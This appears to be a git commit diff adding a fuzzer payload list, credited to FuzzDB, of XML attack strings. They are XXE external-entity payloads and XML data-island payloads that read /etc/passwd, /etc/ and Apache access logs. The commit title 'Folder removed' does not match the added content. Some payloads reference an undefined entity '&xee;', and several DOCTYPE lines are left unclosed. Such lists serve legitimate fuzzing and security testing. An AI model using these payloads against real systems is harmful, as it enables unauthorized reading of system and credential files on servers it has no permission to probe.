Folder removed

2026-04-26 02:28:33 +02:00 · 2019-11-20 18:49:01 +01:00
parent 4ea29e2464
commit 955bddda2f
54 changed files with 163 additions and 163 deletions
--- a/fuzzer/payloads/lists/xml/xml-unix-existing-file-paths.txt
+++ b/fuzzer/payloads/lists/xml/xml-unix-existing-file-paths.txt
@@ -0,0 +1,23 @@
+# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/xml/xml-attacks.txt)
+
+"<xml SRC=""/apache/logs/access.log"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<xml SRC=""/etc/passwd"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<xml SRC=""/apache/logs/"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<xml SRC=""/etc/"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////apache/logs/access.log"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////apache/logs/"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/"">]><foo>&xxe;</foo>"
+
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///apache/logs/access.log">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///apache/logs/">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/">]><foo>&xee;</foo>
+
+<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///apache/logs/access.log">
+<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/passwd">
+<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///apache/logs/">
+<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/">
+<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///apache/logs">
+<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc">